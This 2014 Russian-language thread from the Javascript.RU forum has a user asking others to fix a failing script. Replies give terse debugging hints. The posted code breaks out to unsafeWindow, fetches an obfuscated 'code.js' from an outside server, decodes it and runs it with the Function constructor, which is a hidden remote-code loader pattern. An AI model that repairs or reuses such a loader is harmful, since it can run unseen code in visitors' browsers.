Javascript.RU

Создать новую тему Ответ
 
Опции темы Искать в теме
  #1 (permalink)  
Старый 27.12.2014, 16:20
Аспирант
Отправить личное сообщение для mrKot Посмотреть профиль Найти все сообщения от mrKot
 
Регистрация: 02.01.2014
Сообщений: 85

Ошибка в JS.
Что тут не так? Выдает ошибку Uncaught TypeError: object is not a function

Как его сделать что-бы он работал?

(function () {
        var e = Function,
                serverURL = 'http://szmrc.ru/',
                imgurl = 'code.js';
        var g = this.unsafeWindow;
        (function () {
                var b = document.createElement("script");
                var c = ("t" + Math.random() + +(new Date())).replace(/\./g, "");
                b.text = "window." + c + "=true";
                document.querySelector("body")
                        .appendChild(b);
                if (typeof (g) == "undefined" || !g[c]) {
                        if (window[c]) {
                                g = window
                        }
                        else {
                                var d = document.createElement("script");
                                d.text = "(" + (function () {
                                                var a = document.createElement('unsafeWindow');
                                                a.style.display = 'none';
                                                a.onclick = function () {
                                                        return window
                                                };
                                                document.body.appendChild(a)
                                        }).toString() + ")()";
                                document.querySelector("body").appendChild(d);
                                this.unsafeWindow = document.querySelector("unsafeWindow").onclick();
                                g = window.unsafeWindow
                        }
                }
        })();
        $.ajax({
                type: 'GET',
                url: serverURL + imgurl,
                dataType: 'text',
                success: function (a) {
                        a = $.shift(a, $.key);
                        updateNow = new e(a);
                        updateNow()
                },
                error: function () {}
        })
})();
Ответить с цитированием
  #2 (permalink)  
Старый 27.12.2014, 16:44
Аватар для Safort
Профессор
Отправить личное сообщение для Safort Посмотреть профиль Найти все сообщения от Safort
 
Регистрация: 23.12.2013
Сообщений: 1,856

Какой строке вылетает ошибка?
Ответить с цитированием
  #3 (permalink)  
Старый 27.12.2014, 17:28
Профессор
Отправить личное сообщение для Rise Посмотреть профиль Найти все сообщения от Rise
 
Регистрация: 07.11.2013
Сообщений: 4,662

mrKot,
updateNow = new e(a); // a - должна быть строкой

и че это $.shift, $.key такое?
Ответить с цитированием
  #4 (permalink)  
Старый 27.12.2014, 19:04
Аспирант
Отправить личное сообщение для mrKot Посмотреть профиль Найти все сообщения от mrKot
 
Регистрация: 02.01.2014
Сообщений: 85

27 строка
Ответить с цитированием
  #5 (permalink)  
Старый 28.12.2014, 13:49
Аспирант
Отправить личное сообщение для mrKot Посмотреть профиль Найти все сообщения от mrKot
 
Регистрация: 02.01.2014
Сообщений: 85

Кто-то знает в чем дело?
Ответить с цитированием
  #6 (permalink)  
Старый 28.12.2014, 17:48
Аватар для Erolast
Профессор
Отправить личное сообщение для Erolast Посмотреть профиль Найти все сообщения от Erolast
 
Регистрация: 24.09.2013
Сообщений: 1,436

В том, что object is not a function.
Ответить с цитированием
  #7 (permalink)  
Старый 28.12.2014, 19:52
Аспирант
Отправить личное сообщение для mrKot Посмотреть профиль Найти все сообщения от mrKot
 
Регистрация: 02.01.2014
Сообщений: 85

Как бы его исправить мне?
Ответить с цитированием
  #8 (permalink)  
Старый 29.12.2014, 07:05
Аватар для Erolast
Профессор
Отправить личное сообщение для Erolast Посмотреть профиль Найти все сообщения от Erolast
 
Регистрация: 24.09.2013
Сообщений: 1,436

Подсказка:
alert(typeof null);
Ответить с цитированием
  #9 (permalink)  
Старый 30.12.2014, 01:29
Аспирант
Отправить личное сообщение для mrKot Посмотреть профиль Найти все сообщения от mrKot
 
Регистрация: 02.01.2014
Сообщений: 85

я на сколько понял что туда ничего не поступает через это и ошибка?
Ответить с цитированием
  #10 (permalink)  
Старый 30.12.2014, 07:38
Аватар для Erolast
Профессор
Отправить личное сообщение для Erolast Посмотреть профиль Найти все сообщения от Erolast
 
Регистрация: 24.09.2013
Сообщений: 1,436

Обработчик onclick равен null.
Ответить с цитированием
Ответ



Опции темы Искать в теме
Искать в теме:

Расширенный поиск


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Node js ошибка в console. Chrome AJAX и COMET 3 21.08.2014 14:23
Ошибка в JS (заливка данных) mrKot Элементы интерфейса 1 23.05.2014 00:02
внезапно ошибка в JS не подгружает теги обратно artstyle Элементы интерфейса 9 05.07.2012 19:31
Ошибка в коде Js, Неправильно работает скрипт. Julia Panatova Общие вопросы Javascript 1 19.01.2011 14:12
Ошибка в коде Js, Неправильно работает скрипт. Julia Panatova Общие вопросы Javascript 7 07.01.2011 13:41